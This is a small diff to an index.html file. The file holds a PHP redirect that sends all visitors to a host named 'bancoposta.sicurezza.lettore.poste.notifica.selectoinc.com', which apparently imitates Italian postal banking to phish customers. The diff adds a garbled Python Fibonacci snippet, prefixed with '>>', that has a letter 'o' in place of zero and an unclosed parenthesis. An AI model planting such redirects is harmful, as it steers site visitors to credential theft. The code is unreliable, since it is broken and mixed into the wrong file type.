--- a/index.html
+++ b/index.html
@@ -2,3 +2,10 @@
 header("location: http://bancoposta.sicurezza.lettore.poste.notifica.selectoinc.com/7/personale/");
 ?>
 hello!! 안녕하세요
+>> def fib(n):
+>> a, b = o, 1
+>> while a < n:
+>> print(a, end=" ")
+>> a, b = b, a+b
+>> print(0
+>> fib(1000)
